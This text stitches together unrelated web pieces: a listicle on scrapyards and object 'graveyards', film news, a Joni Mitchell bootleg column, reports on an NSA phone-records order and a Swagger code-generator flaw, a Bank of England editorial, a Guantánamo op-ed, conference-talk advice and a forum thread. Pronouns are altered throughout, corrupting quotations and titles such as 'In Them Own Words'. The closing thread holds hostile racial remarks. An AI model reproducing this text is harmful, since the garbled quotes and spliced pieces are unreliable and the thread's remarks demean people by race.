The Fiberglass Animals, Shapes, and Trademarks (FAST) company has been making decorative figures and mascots for years. As a part of the process, a mold is created that essentially looks like a creepier version of the final product. Not wanting to waste a form that could be reused in the future, the company simply deposits old molds in the field behind their factory. As they have accumulated over the years, this fiberglass graveyard has become home to a wild menagerie of lifeless beasts ranging from sharks to mice to dragons, all looking not unlike oddly shaped headstones. However the dead here are not buried, they are just sitting out on the surface.
It's like if Medusa was really into roadside attractions. (Photo: Jen Lukehart)
The plural is “Jaws” is just “Jaws” (Photo: Jen Lukehart)
4. BÅSTNÄS CAR CEMETERY
Varmland, Sweden
Yer cars covered in moss. There's yer problem. (Photo: hrnick)
This secluded car graveyard is home to countless, scenically overgrown wrecks, but woe be it to anyone who thinks of stealing from the rusting collection of automobiles. Slowly assembled by a pair of reclusive brothers living on the Swedish/Norwegian border, many of the cars that can be found throughout the woods and out front of their house are said to have been left in the country after World War II. Photographers are a regular site in the graveyards, and the brothers don't seem to mind, but they have posted this warning,
This car cemetery is private property. You may still look, take pictures but DO NOT take away parts. Do not destroy or in any other way disrupt this place. If you open a car door, please shut it again so the next visitor get the same experience as you did!! For info: after about 30 burglaries this year I'm fed up with it! I've made traps in the buildings so if you get hurt or die, I DON'T CARE! Remember in this place no one can hear you scream…
Pretty harsh for a graveyard.
I'm not sure what that sign translates to, but I'm going with “Nothing Creepy Here.” (Photo: hrnick)
This trunk IS junk. (Photo: hrnick)
5. RED TELEPHONE BOX GRAVEYARD
Carlton Minniot, United Kingdom
Can dead phone boxes talk to ghosts? (Photo: Andy Armstrong on Wikipedia)
Once a ubiquitous icon of the English Empire, the red telephone box has faded from its once glorious notoriety, and many of the old booths have been abandoned hundreds of scrapyards and storage sites. One of these dumping grounds can be found in the northern England village of Carlton Miniott. Here, hundreds of the crimson icons can be found, paint chipping, and metal rusting. They are stood in rows and piled on top of one another like a big, red, mass grave. This telephony cemetery can be seen as graveyard not only for these obsolete bits of technology, but for a bygone era of English history as well.
Phone with no home. (Photo: Les Chatfield on Wikipedia)
A mass telephone grave. (Photo: David Rogers on Wikipedia)
6. 309TH AEROSPACE MAINTENANCE AND REGENERATION GROUP
Tucson, Arizona
Now, where did we park? (Photo: Niteowlneils on Wikipedia)
Known rather tellingly as “The Boneyard,” the 309th Aerospace Maintenance and Regeneration Group on the Davis-Montham Air Force Base in Tuscon, Arizona is home to thousands of decommissioned aircraft, lined up in neat rows just like a military cemetery. The massive field of dead birds contains almost every type of American aircraft ever flown after World War II. From B-52 bombers to 707 passenger planes, the graveyard is an eclectic collection of airplanes that one could quite literally get lost in. Not to sound ghoulish, but many of the planes are harvested for parts to repair military craft that are still in use. This field of the dead is as much a chronicle of 20th century flight as any museum.
When you're a jet, you're a jet til your last dying day. (Photo: Tungsten on Wikipedia)
7. NEON BONEYARD
Las Vegas, Nevada
Looking for old neon signs? You just hit the jackpot. (Photo: Avoiding Regret)
As the saying goes, nothing gold can stay, and this even true of the glittering lights of Las Vegas' inescapable decorative signage. When large signs are take down they are often carted off the to the city's Neon Boneyard to rust away in the company of their strange, colorful brethren. Hundreds of signs covered in vintage bulbs or shaped-neon are stacked countless deep, creating strange valleys of deceased advertising. A number of famous signs such as the original sign for the Stardust Hotel can be found in the steel cemetery, but most are just the final reminders of businesses that no longer exist. Sin City has led many people to an early grave, but none of them looked as cool as this one.
That shirt is having a great day. (Photo: Avoiding Regret)
This sign just collects regular dust now. (Photo: Avoiding Regret)
8. SPACECRAFT CEMETERY
Pacific Ocean, New Zealand
This graveyard is a bit hard to visit. (Image: Google Maps)
Unfortunately there are no pictures of the spot known as the Spacecraft Cemetery, but that is because it is at the bottom of the Pacific Ocean. Even spaceships need to die, and when they do, they have to be buried somewhere where their exotic technologies and materials don't fall into the hands of rival countries or worse. So rather than just leaving them in orbit like so much space junk, many larger craft are commanded to fire themselves to the bottom of the ocean just off the coast of New Zealand. Decommissioned satellites, containers of astronaut poop, and even the entirety of the Mir space station can be found lurking in the depths of the cemetery, waiting to be discovered by some far future grave-robbers like so much pirate's treasure.
One day the International Space Station will be at the bottom of the ocean. (Photo: NASA)
Visit the FAST Fiberglass Mold Graveyard on Obscura Day 2015, May 30th!
Asghar Farhadi, the Oscar-winning Iranian director of “A Separation” and “The Salesman,” has kicked off principal photography on “Everybody Knows” (“Todos Lo Saben”), their psychological thriller starring Javier Bardem, Penelope Cruz and Ricardo Darin.
Budgeted at 10 million euros ($11.8 million), the Spanish-language film is being produced by Alexandre Mallet-Guy at Paris-based Memento Films Production and Alvaro Longoria at Spanish outfit Morena Films.
Written by Farhadi, “Everybody Knows” follows the journey of Carolina as they travel with their family from Buenos Aires to their hometown in Spain for a celebration. Meant to be a brief visit, the trip is disturbed by unforeseen events that will completely change the lives of Carolina and their family.
“Everybody Knows,” which has started shooting near Madrid, is being sold worldwide by Memento Films International.
“Everybody Knows” marks the third collaboration between Farhadi and Mallet-Guy after “The Salesman” and “The Past,” which Memento Films produced and distributed in France. Before winning a foreign-language Oscar, “The Salesman” scooped two awards at last year's Cannes for best script for Farhadi and best actor for Shahab Hosseini, while “The Past” earned Berenice Bejo the best actor award at Cannes in 2013.
“Everybody Knows'” key crew includes Jose-Luis Alcaine, a cinematographer who has worked with Carlos Saura, Bigas Luna and Pedro Almodovar; Sonia Grande, the costume designer of Woody Allen's “Midnight in Paris” and Alejandro Amenábar's “The Others”; and Hayedeh Safiyari, the editor who worked with Farhadi on “A Separation” and “The Salesman.”
France 3 Cinema, Lucky Red, Untitled Films Aie and Ashar Farhadi Production are co-producing “Everybody Knows” in association with Memento Films Distribution, Cofinova and Indefilms.
“Everybody Knows” is being backed by Canal Plus, Eurimages, France Televisions, Movistar, Cine + and ICAA.
Invisible Hits is a column in which Tyler Wilcox scours the internet for the best (and strangest) bootlegs, rarities, outtakes, and live clips.
Unlike many of their peers, Joni Mitchell seems firmly opposed to raiding their own vaults. As folks like Bob Dylan and Neil Young allow more and more demos, live performances, and other rarities to be released formally, Mitchell's unreleased material remains mostly out of reach. In a 2015 New York Magazine interview, Mitchell referred to a hopeful archivist from their record company as “a burglar,” and quashed plans for a box set that would include a wealth of unheard music from over the decades.
One can't help but respect their stubbornness in keeping those rough drafts and concert tapes to herself. But the unreleased Joni Mitchell material that has slipped into the hands of collectors (and subsequently onto the ‘net) is illuminating—especially recordings from 1965 to 1975, which trace the songwriter's path from folk club obscurity in Winnipeg to superstardom. Joni might not like it, but a peek behind the curtain is nearly irresistible for fans.
“Let's Sing Out” Performances (1965-1966)
Some of the earliest Joni Mitchell performance clips are from the Oscar Brand–hosted CBC television show “Let's Sing Out,” on which they appeared several times in the mid-1960s. At first performing under their maiden name Joni Anderson, they obligingly play a few folkie chestnuts, including John Phillips' “Me & My Uncle” and the old English traditional “Blow Away the Morning Dew.” But they were already getting attention for their original compositions, too. In particular, the still-unreleased “Just Like Me” hints at the heights Mitchell would soon climb, showing off their signature soprano, their keen eye for lyrical detail, and their expert guitar skills. “My guitar playing was never like anybody else's,” Mitchell told Malka Marom in Joni Mitchell: In Them Own Words. “For a moment I sounded a little bit like Joan Baez. An influence snuck in, but when I started to write, it disappeared. And I never, from then on, wanted to sound like anybody else.”
“Sugar Mountain” on Philadelphia's WHAT-FM (1967)
In those early days, however, Mitchell wasn't entirely confident in their abilities. “It sucks and you're going to hate it,” they told songwriter friend Tom Rush of “The Circle Game,” their Ladies of the Canyon closing track that has since become a campfire singalong classic. “The Circle Game” was inspired by a song from another Canadian folkie who was just beginning to find their own singular voice: Neil Young's “Sugar Mountain.” “I thought, God, you know, if we get to 21 and there's nothing after that, that's a pretty bleak future,” Mitchell said of Young's melancholy ode to lost innocence. “So I wrote a song for him, and for myself just to give me some hope.” Though they went to the trouble of responding in song, Joni also made “Sugar Mountain” thoroughly their own when they covered it on Philadelphia's WHAT-FM in 1967. And while Young has never covered a Mitchell song in return, they did write the lovely, as-yet-unreleased “Sweet Joni” in tribute to their old friend in 1973.
“Big Yellow Taxi” + “Both Sides Now” on the BBC (1969)
By 1969, Mitchell had found a sizable audience, with their debut LP Song to a Seagull and its follow-up Clouds. In this BBC clip, we see the songwriter as the listening public first saw her: an angel with a million-watt smile. But of course, it's their music that leaves the most indelible impression, whether it's the future hit “Big Yellow Taxi” or the made-famous-by-others-first favorite “Both Sides Now.” Though the latter quickly became a modern standard covered by everyone from Frank Sinatra to Leonard Nimoy, “Both Sides Now” remained intensely personal to Mitchell. “‘Both Sides Now' was triggered by a broken heart, the loss of my child,” they said in Joni Mitchell: In Them Own Words, referring to the daughter they gave up for adoption in 1965. “In this three-year period of childhood's end, I'd come through such a rough, tormented period as a destitute, unwed mother. It was like you killed somebody, in those times.”
Blue Outtake “Hunter” (1970)
For many, Mitchell's 1971 LP Blue is their masterpiece, blending starkly personal lyrics with gorgeous melodies, razor-sharp wit with world-weary heartbreak. “Hunter,” an unreleased song from the album's sessions, would have fit in perfectly among such classics as “River” and “A Case of You.” The song was finally given an official release in 2009 as part of the Amchitka live album (which features Mitchell alongside James Taylor and Phil Ochs circa 1970), but this solo demo is the superior take—a lost Joni classic. “The Blue album, there's hardly a dishonest note in the vocals,” Mitchell told Cameron Crowe in 1979. “At that period of my life, I had no personal defenses. I felt like a cellophane wrapper on a pack of cigarettes. I felt like I had absolutely no secrets from the world, and I couldn't pretend in my life to be strong. Or to be happy. But the advantage of it in the music was that there were no defenses there either.”
Intimate Carnegie Hall Show (1972)
“There are moments in shows where I have felt as comfortable with 4,000 people as with talking to a new friend,” Mitchell told Malka Marom in 1973. “I felt mass warmth that I could translate to one-to-one.” They didn't specifically call out this 1972 Carnegie Hall performance, but they easily could have. The good vibes flow from beginning to end as Mitchell presents a flawless selection of songs from Blue, the then-unreleased For the Roses, and a few dips into older material, including a communal “The Circle Game” with Stephen Stills and Graham Nash (not to mention the entire Carnegie crowd) joining in on harmonies.
“Raised on Robbery” Outtake with Neil Young (1973)
Mitchell's music became more intricate and refined as the '70s progressed, but they attempted something much rawer when they dropped in on Neil Young's tequila-soaked Tonight's the Night sessions in 1973. “One night Joni Mitchell came in and did ‘Raised on Robbery' in the most sexy and revealing version that song ever had,” Young wrote in Waging Heavy Peace. “She still refuses to let me release it. I don't know what they were thinking when they joined us and sang the song. It kicks ass. What the fuck was that about? It was funkier than anything they have ever cut. A total gem!” Unfortunately for us, this rave review is all we have to go on: the recording has never been bootlegged. Perhaps Neil will convince Joni to let them include the tune on the next volume of their Archives project.
“Edith and the Kingpin” Demo (1975)
The Hissing of Summer Lawns, Mitchell's brilliant, ambitious 1975 LP, saw the songwriter further exploring jazz- and Latin American–influenced textures and rhythms. Not particularly well-received at first, the album would go on to have several high-profile fans, including Prince (a decade after its release, they called it “the last album I loved all the way through”) and Morrissey (“it was the first album that completely captivated me”). The unreleased demos Mitchell made for The Hissing strip back some of the album's thick layers, linking the songs more closely (sonically at least) to Blue and For the Roses. While the finished product is certainly unbeatable, these intimate recordings give us a glimpse of the painstaking approach Mitchell takes to perfecting them art. “How does a person create a song?” they said in Joni Mitchell: In Them Own Words. “A lot of it is being open, I think, to encounter and to, in a way, be in touch with the miraculous.”
Roger Vinson, the same federal judge who ruled the Affordable Care Act unconstitutional in 2011, signed an order that compels Verizon to give the National Security Agency information on all telephone calls in its system.
The Verizon order was revealed Wednesday night in a report from The Guardian's Glenn Greenwald. It requires Verizon to produce "certain call detail records or 'telephony metadata'" created by the company. The report has already sparked concern and outrage from people questioning the federal government's surveillance powers.
Here, side by side, are the Obamacare ruling and the Verizon order, courtesy of Twitter user @nycsouthpaw:
In 2011, Vinson ruled the key portion of Obamacare — the individual mandate — unconstitutional. In their decision, they put forth the metaphor that Congress could theoretically mandate Americans to buy certain foods.
"Everyone must participate in the food market," they wrote. "... Under this logic, Congress could [mandate] that every adult purchase and consume wheat bread daily."
The ruling put the law on the path to an appeal before the U.S. Supreme Court.
Life is getting interesting at the Bank of England. Next month will mark the 10th anniversary of the last time the technocrats of Threadneedle Street raised the official cost of borrowing, but the chances of an interest rate rise are higher than they have been for some while. Mark Carney, the Bank's governor, thinks the time is not yet ripe for a tightening of policy. They used their delayed Mansion House speech in the City of London this week to voice concerns about the negative impact of higher inflation on consumer spending and the uncertain effects of Brexit negotiations on the economy. But three of the eight members of the Bank's monetary policy committee took a different view, and they were almost joined by a fourth, the Old Lady's chief economist, Andy Haldane, who said the time was fast approaching when they would vote for an increase. Mr Haldane's intervention was significant, not just because they have hitherto been seen as one of the MPC's most prominent “doves”, nor because their intervention came little more than 24 hours after that of their boss. Rather, it was because the bombshell was dropped at the end of a speech that seemed to argue the opposite.
For years, the Bank of England has been trying to find the answer to a puzzle: why is wage growth so weak even though unemployment keeps coming down? Britain currently has its lowest jobless rate since the mid-1970s, but there has been no sign of an acceleration in earnings growth. Quite the contrary, in fact. At least part of the answer, according to Haldane's analysis, stems from structural changes in the labour market: a decline in union membership; more self-employment; more zero-hours contracts and more part-time and temporary work. The clock has been turned back not one century but three, so that the world of work in 2017 bears more than a passing resemblance to Britain as it was before the Industrial Revolution. There were no trade unions. Most people were self-employed or worked in a small business. The Uber drivers of that era were the agricultural workers hired only when there were cows to be milked or crops to be harvested. In those pre-industrial days, the relationship between wages and unemployment was strikingly similar to the one seen since the recession of 2008.
The thrust of Mr Haldane's argument is that workers in an increasingly casualised, de-unionised and atomised labour market find it hard to chisel more money out of their employers even when unemployment is falling and their living standards are being eroded by inflation. If all this is true – which it is – then Mr Carney's wait-and-see approach to interest rate rises makes sense. The only genuine reason for the Bank to be alarmed about inflation running at 2.9% would be if there was the prospect of workers securing compensatory pay awards and setting off a good old-fashioned wage-price spiral. Not only is there no sign of this happening, tightening policy now could hit the economy when it looks vulnerable on three fronts: from a slowdown in consumption; from political turmoil; and from Brexit uncertainty.
It would be a different story were the government prepared to boost the economy with higher public spending or lower taxes, and there is a strong case for changing the mix of macroeconomic policy so that monetary policy (interest rates and quantitative easing) takes less of the strain and fiscal policy (taxes and spending) plays a bigger role. There is plenty of evidence to suggest that the current mix of ultra-loose monetary policy and over-tight fiscal policy needs to be changed. Chucking copious amounts of cheap money at the UK economy has not led to strong and sustainable growth: rather, it has boosted asset prices, exacerbated the structural weaknesses of the economy by setting off a housing boom, and led to greater inequality. But until the chancellor decides it is time to add substance to the government's end-to-austerity rhetoric, the Bank of England is the only game in town. Mr Carney is right to be cautious.
Researchers at Rapid7 found a vulnerability in the Swagger Code Generator that could execute arbitrary code embedded in a Swagger document.
An unexpected behavior in a relatively new and popular open source API framework called Swagger could lead to code execution, researchers at Rapid7 said.
The company today disclosed some details on the vulnerability, and released a Metasploit exploit module and a proposed patch written by researcher Scott Davis who found the flaw.
Details were privately disclosed on April 19 to the Swagger API team and then on May 9 to CERT, Rapid7 said. To date, Rapid7 Security Research Manager Tod Beardsley told Threatpost, there has been no response from Swagger's maintainers. Rapid7 said it shared its patch with CERT on June 16 and today made its public disclosure.
As of Jan. 1, the Swagger specification was donated to the Open API Initiative and became the foundation for the OpenAPI Specification.
The Swagger specification describes, produces and consumes RESTful web services APIs in human- and machine-readable formats. According to Rapid7, Swagger documents can be automatically consumed to generate client-server code, primarily for testing purposes prior to deployment.
“The Swagger definitions are flexible enough to describe most RESTful APIs and give developers a great starting point for their API client,” Rapid7 said in its report. “The problems is that several of these code generators do not take into account the possibility of a malicious Swagger definition document which results in a classic parameter injection, with a new twist on code generation.”
Beardsley said the vulnerability lies in the Swagger Code Generator, and specifically in that parsers for Swagger documents (written in JSON) don't properly sanitize input. Therefore, an attacker can abuse a developer's trust in Swagger to include executable code that will run once it's in the development environment. They added that the flaw behaves similarly to the way attackers embedded malicious executable code inside an Office document.
“If I give you an Office doc, you're not expecting it to run code, but I can do that,” Beardsley said. “With these Swagger vulnerabilities, I can poison [a Swagger document] and run code on the web server itself.”
Rapid7 said the vulnerability covers the Swagger Code Generator for NodeJS, PHP, Ruby and Java, plus other languages supported by the tool. The research report says that maliciously crafted Swagger documents can dynamically build API clients and servers that execute embedded code. The parsers and generators, Rapid7 said, do not properly sanitize parameters within a Swagger document as it generates code.
“On the client side, a vulnerability exists in trusting a malicious Swagger document to create any generated code base locally, most often in the form of a dynamically generated API client,” Rapid7 said. “On the server side, a vulnerability exists in a service that consumes Swagger to dynamically generate and serve API clients, server mocks and testing specs.”
Beardsley said that exploits would afford an attacker operating system access in the same context as the web server and could allow an attacker to steal private crypto keys, SSL certs, change application functionality or generate new pages, for example.
Rapid7 recommends that developers inspect Swagger documents for “language-specific escape sequences,” until a patch is available.
“Fixes need to be implemented by those creating code generation tools, in general this does not apply to the swagger documents themselves,” Rapid7 said. “Mitigations for all issues include properly escaping parameters before injecting, while taking into account the context the variable(s) are used in inline code creation, and what sanitization efforts are in place to ensure the context of trust for an API specification can maintain a level of code creation free for remote code execution in the known, easily avoidable cases.”
A Maine hunter featured on Yes on 1 ads in support of the bear referendum has been accused of using non-fair chase tactics while hunting ruffed grouse.
Joel Gibbs, 56, of Lowell, was charged with shooting a firearm from a motor vehicle on Oct. 17 in Masardis, a small town in Aroostook County, after game wardens allegedly witnessed Gibbs shoot at a ruffed grouse through the open window of a vehicle, according to Lt. Dan Scott of the Maine Warden Service.
Gibbs was recently featured as a “Maine bear hunter” in the pro-ban television and online advertisement entitled “Stop,” funded by Mainers for Fair Bear Hunting, the group leading the Yes on 1 campaign. In the ad, Gibbs states, “I've hunted all my life, and this cruelty has no place in Maine.”
In Maine, shooting from a motor vehicle (or even having a loaded firearm in a motor vehicle) is a Class E crime, punishable by up to six months of imprisonment and a $1,000 fine.
Gibbs, however, denies shooting the grouse in an unsportsmanlike way.
“I didn't shoot anything from my vehicle,” Gibbs said. “I wouldn't believe a thing they say.”
The concept of “fair chase,” as defined by the Maine Department of Inland Fisheries and Wildlife, is “the ethical, sportsmanlike, and lawful pursuit and taking of game animals in a manner that does not give the hunter an improper advantage over such animals.”
It's a chief ethical concept considered in the creation of hunting rules and regulations throughout the United States.
“It's something that we generally issue summonses for,” Scott said. “It's a fair chase ethical issue and a safety issue. It's dangerous, and it's a fair chase issue for wildlife.”
A lifelong hunter, Gibbs themselves referred to the concept of fair chase in an OpEd they wrote in support of the upcoming referendum, which was published by the BDN on July 16. In the editorial, Gibbs wrote that the use of bait, dogs and traps in bear hunting is “lazy” and “cruel.”
“Join me in helping restore fair chase to our bear hunt,” Gibbs wrote, “by voting yes on Question 1 in November.”
The Lowell resident was also featured in BDN story on Aug. 16, “ Battle for bears: science versus ethics,” as an example of a Maine hunter that has successfully harvested black bear without the use of bait, dogs or traps.
“As far as the wardens and biologists, I'd be a little bit skeptical to believe in anything they say right now,” Gibbs said Monday.
DIF&W wardens and biologists strongly oppose the referendum and have been featured in several No on 1 campaign advertisements, as well as in public debates.
“Obviously [shooting from a vehicle] is something that the No on 1 campaign would never condone,” James Cote, campaign manager for the No on 1 campaign, said. “We think it's really unfortunate that someone who the Yes on 1 campaign has portrayed as a spokesperson for several months now, accusing traditional Maine hunters for being unethical and unfair, is now shown in the light of being given a summons for a hunting violation.”
“We expect that Mr. Gibbs will have their say if the state pursues the charge,” Katie Hansberry, campaign director for the Yes on 1 campaign, said. “Any dispute between Mr. Gibbs and the Warden Service has no relevance to Question 1 and the banning of bear baiting, trapping and hounding.”
Gibbs is scheduled to appear for their arraignment at District Court in Presque Isle in December.
The Only Way Out Of Guantanamo Is In A Coffin
Detainees sit around the exercise yard in Camp 4, the facility within Camp Delta at Naval Station Guantanamo Bay, Cuba. Photo by U.S. Army Sgt. Sara Wood
Despite sweeping into office promising to close Guantánamo, President Obama now oversees a prison that may well stay open forever, from which the only exit route is in a coffin.
The last living prisoner to be released from Guantánamo was Farhi Saeed bin Mohammed, an Algerian who was repatriated against their will in January. Since then, an Afghan prisoner, Awal Gul, died in February after taking exercise, and on Wednesday the US military announced that another Afghan prisoner, Inayatullah, who was 37 years old, “died of an apparent suicide,” early on the morning of May 18.
A US Southern Command news release explained, “While conducting routine checks, the guards found the detainee unresponsive and not breathing. The guards immediately initiated CPR [cardiopulmonary resuscitation] and also summoned medical personnel to the scene. After extensive lifesaving measures had been exhausted, the detainee was pronounced dead by a physician.”
Later, a Guantánamo spokesperson, Army Lt. Col. Tanya Bradsher, said that Inayatullah was discovered “hanging from their neck by what appear[ed] to be bed linen” in one of the prison's recreation yards — a scenario that surely raises the question of how, in a prison where the detainees are closely monitored all the time, they were allowed to spend enough time unmonitored in a recreation yard to be able to kill himself.
Unlike the majority of the remaining 171 prisoners at Guantánamo, Inayatullah had not spent nearly ten years of their life in the prison. The penultimate detainee to arrive at Guantánamo, they were flown in from Afghanistan in September 2007, but no information about them had been released after a press release was issued by the Pentagon announcing their arrival.
It is not known if they had ever been subjected to a Combatant Status Review Tribunal — the review process used by President Bush to assess whether prisoners had been correctly designated, on capture, as “enemy combatants” who could be held indefinitely — but it was noticeable that, in the recent release by WikiLeaks of classified military documents relating to the Guantánamo prisoners, Inayatullah's was one of 14 files that were missing from the documents that were initially handed over to WikiLeaks, suggesting that they had not, in fact, been subjected to any type of process that claimed to legitimize their presence at Guantánamo.
In describing Inayatullah after their death, the US military recycled information from its initial press release announcing their arrival at the prison three years and eight months ago, claiming that they were “an admitted planner for Al-Qaeda terrorist operations, and attested to facilitating the movement of foreign fighters, significantly contributing to transnational terrorism across multiple borders.” It was also claimed that they “met with local operatives, developed travel routes and coordinated documentation, accommodation and vehicles for smuggling Al-Qaeda belligerents through Afghanistan, Iran, Pakistan and Iraq.”
Noticeably, however, what was missing was another claim, also aired in the military's September 2007 press release, that they had “admitted that they were the Al-Qaeda Emir of Zahedan, Iran,” and that they had been transferred to Guantánamo “[d]ue to the continuing threat [he] represents and their high placement in Al-Qaeda.”
This was perhaps because that hyperbole had been punctured. Of the six prisoners who arrived in Guantánamo between March 2007 and March 2008, just two — whose files were also missing from the documents made available to Wikileaks — are regarded as “high-value detainees.”
These two are Nashwan Abd Al-Razzaq Abd Al-Baqi, more commonly known as Abd Al-Hadi Al-Iraqi, and Muhammad Rahim, an Afghan, and they join the 14 “high-value detainees” sent to Guantánamo from secret CIA prisons in September 2006, who include Khalid Sheikh Mohammed, the alleged mastermind of the 9/11 attacks, as the only “high-value detainees” at Guantánamo — a grand total of 16 out of the remaining 171 prisoners.
It is too late for Inayatullah or Awal Gul to receive anything that resembles justice, as it is for the six other men who have died at Guantánamo in the last five years — the three disputed suicides in June 2006, the fourth alleged suicide in May 2007, the death by cancer of an unacknowledged Afghan hero in December 2007, and the fifth alleged suicide in June 2009.
More depressingly, it is unlikely that the evident truth about Obama's Guantánamo — that the only way out is by dying — will shift public option either at home or abroad. Although the President is not entirely to blame for their failure to close the prison, as they have been confronted by unprincipled Republican opposition on a colossal scale, and also by cowardice in their own party, it ought to be unacceptable that their early promise has turned to such paralysis.
My hope is that there will eventually be a mobilisation of high-level international criticism about Guantánamo, as there was under President Bush, with international bodies and world leaders realizing that Guantánamo has become, once more, a place of indefinite arbitrary detention, and moreover, one that will remain open forever without concerted effort to close it.
Until that time, decent people must be wondering who, at Guantánamo, will be next to die, and reflecting that, whatever Inayatullah's alleged crimes, it was inappropriate that, because of President Obama's embrace of their predecessor's detention policies, they died neither as a convicted criminal serving a prison sentence for activities related to terrorism, nor as a prisoner of war protected by the Geneva Conventions.
The Obama administration cunningly dropped the use of the term “enemy combatant” in its legal dealings regarding the prisoners, but that is essentially what they remain, and if Inayatullah's death were to be marked by words, they could, in all fairness, be described as follows:
Inayatullah — enemy combatant: held and died without charge or trial, to America's undying shame.
Originally published on the website of the Future of Freedom Foundation.
Andy Worthington, a regular contributor to The Public Record, is the author of The Guantánamo Files: The Stories of the 774 Detainees in America's Illegal Prison and the definitive Guantánamo prisoner list, published in March 2009. They maintain a blog at andyworthington.co.uk.
I'm going to be conducting a few of the tracks for this year's RailsConf, specifically the Novice, Testing, and Crafting Code tracks. I'm very excited, this isn't an opportunity I've had before.
What I want from all of you is awesome proposals. I want to have to make hard decisions. I want to be inundated with all your amazingness.
Because I want to hear from all of you, here are some opinions on how to best present yourself in a speaking proposal.
Yes, You Can. In Fact, Please Do
In response to my initial round of begging for proposals on Twitter, somebody commented that they didn't think they were the most qualified person to talk on a particular subject.
To which I have three cheesy but true responses:
A conference that was limited to only people that really though they were the most qualified person to talk would be depressing, if not completely horrific.
You are absolutely the most qualified person to tell me what you think on a particular topic.
This is how you become qualified. You study something, you teach it to other people.
In other words, please don't let that stop you. If you don't submit a proposal, you have zero chance of being accepted.
(In a similar vein, here's a talk I once gave about how everybody has technical writing in them. Video's poor, but audio is okay.)
I can't speak for any of the other conductors, but I'm also looking for people who want to give shorter talks (10-15 minutes) with the idea that we might have a session that is 2 or 3 awesome shorter talks. If that interests you, definitely mention it when you submit.
What Should I Talk About?
Let's say, for the sake of argument, that I've convinced you that you should submit a proposal to RailsConf or the conference of your choice.
But you don't know what to talk about.
Here are some ideas. This is the kind of process I go through when I try to get ideas for a talk, though by writing it down I'm making it more systematic.
Think of these as prompts and use them as starting points to find an idea for a talk that excites you.
These are far from the only seeds for good presentations, but it's a start.
What is the last thing you spent more than 15 minute trying to figure out?
What is the last tool, process, or code you wrote that made you excited enough to tell somebody else?
What was the last question you asked a more senior developer?
What was the last question a more junior developer asked you?
What do you wish somebody had told you a year ago?
What was the last blog post or presentation in the community that you disagreed with?
Do you have a hobby or interest that informs your work?
What is the best line of code you wrote this week? How could you tell?
What was something you did for the first time in your last project? How did it work out?
What was something you did for the last time in your last project (or something you stopped doing for your last project)? How did that work out?
What is a tool or process you would like to learn more about?
Once you have an idea, try to answer these questions about it.
Who is the audience for this? It often helps to think of one specific person that you'd like to talk to.
Is there a story here? What is the beginning, the middle, and the end?
If a person watches this talk, what will they be able to do after the talk that they would not have been able to do before?
UPDATE 1/19 It seems worth pointing out that I'll be speakng at MountainWest RubyConf this year. The talk is on Smalltalk, and it's a direct result of a presentation I saw and wanted to respond to (I didn't actually disagree with the presentation, but I had another take on the topic). Also, I know for a dead certain fact that one of the other speakers is a much bigger Smalltalk expert than I am. And I am going to take may own advice and not let that bother me.
What Makes A Great Submission
I have opinions on the actual submission -- watch for updates after I dive into the actual submissions.
I'm going to share with you the first rule of submitting anything. This rule is applicable to any situation where a person has to spend a lot of time evaluating submissions -- resumes, conference proposals, writing submissions all included.
Rule One: The person reading these submissions is always looking for a way to save time. Don't give them a reason to reject you out of hand.
That means: if they have a format, hit the format. If they have a word count, hit the word count. Spell words correctly. Write in grammatical English. Sure, the reader might take extra time to figure you out if you bend the submission rules. But why take the chance?
Have somebody else read and edit you if you can. Find a buddy and read over each others. (I'm willing to be your editing buddy -- contact me via this web site).
In most cases, the talk descriptions on conference web sites are taken directly from the submission -- look through some, and see what makes them compelling.
Specifically for conference proposals:
Make sure you specify: a) who the audience is, b) what they should expect, c) what they will learn.
For a long time I was afraid to give out details of my talk in the abstract for fear of "giving stuff away". That was a bad idea. You need to give people an idea of what to expect. (The RailsConf CFP has a details field that lets you put in details for the organizers and not the abstract -- use that)
You don't have to explain why you are an expert, but if you have a particular reason why you might have insight into the subject, mention it. This reason is not at all limited to you having vast experience on the topic.
Good luck, and I look forward to hearing from you.
Skip to comments.
'Please refrain from taking up space': Rules for white people at Michael Brown vigil in Toronto
Posted on by Altura Ct.
White people were encouraged not to take up space or talk to the media at vigil for Michael Brown in Toronto, Canada, on Tuesday Facebook post sparked war of words, accusations of 'pro-segregation' Comes after shooting of black teenager highlighted severe racial divides between white police force and African American civilians in Ferguson Grand jury verdict not to indict Officer Wilson provoked global protests
A set of rules for white people at a vigil for Michael Brown in Canada has sparked controversy with critics accusing organizers of promoting segregation.
'Non black allies' were told to 'refrain from taking up space in all ways possible' and 'never be at the centre of anything' at the event in Toronto on November 25.
The Facebook page also advised white demonstrators to 'refrain from speaking to the media' and 'stand behind black folks or between us and the police'.
Controversial: These were the guidelines suggested to white supporters at an anti-racism protest in Canada
Controversial: These were the guidelines suggested to white supporters at an anti-racism protest in Canada Tensions: The grand jury's refusal to indict white police officer Darren Wilson for the shooting of unarmed black teenager Michael Brown has sparked protests against racism across the US, Canada and Europe +6
Tensions: The grand jury's refusal to indict white police officer Darren Wilson for the shooting of unarmed black teenager Michael Brown has sparked protests against racism across the US, Canada and Europe
'If you see a cop harassing a black person,' it added, 'come in and engage (chances are they are least likely to arrest you)'.
It has provoked tension in the wake of the grand jury verdict in Ferguson, which refused to indict officer Darren Wilson for the fatal shooting of unarmed black teenager Michael Brown.
http://www.dailymail.co.uk/news/article-2852167/Please-refrain-taking-space-controversial-rules-white-people-Michael-Brown-vigil-Toronto.html
(Excerpt) Read more at dailymail.co.uk ...
TOPICS:
KEYWORDS:
blackseparatists
neosegregation
occupyferguson
waronwhites
To: Altura Ct.
UNREAL!!!
To: BOOHA
Further proof that this whole thing is being coordinated by the International Left. Where is the money coming from?
To: Altura Ct.
When will they ever learn? When will they EVVVVVVVVVVVVVVVer learn?
by 4 posted onby A_Former_Democrat (Get ready St. Louis . . . Guns Up . . .LnL . . .STK)
To: Altura Ct.
These whites think that they will be like those whites from the 60s marching with the black civil rights crowd.
To: Altura Ct.
No first amendment in Canada either.
by 6 posted onby Doomonyou (Let them eat Lead.)
To: Altura Ct.
Before long, they'll be demanding their own water fountains
To: Altura Ct.
White Tokens Not Required
To: Altura Ct.
and after blacks have given these sorry ass white guilt losers their orders, they'll still trip over themselves to march against white racism and privilege. and plenty of hopeless college kids will too.
To: Altura Ct.
they appear to have taken lessons from the FIrst Post Racial President..and saul alinsky
by 10 posted onby MeshugeMikey ("Never, Never, Never, Give Up," Winston Churchill ><>)
To: Altura Ct.
How do you like that, white libs/leftists?
To: Altura Ct.
Quite the racist fools.
To: Altura Ct.
Guideline #8: If you're white and black persons strike you, slap you, or kick you, be polite and do not get angry.
